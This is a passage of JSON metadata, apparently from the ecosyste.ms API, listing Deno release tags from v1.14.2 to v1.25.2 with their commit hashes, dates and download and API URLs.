and/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/a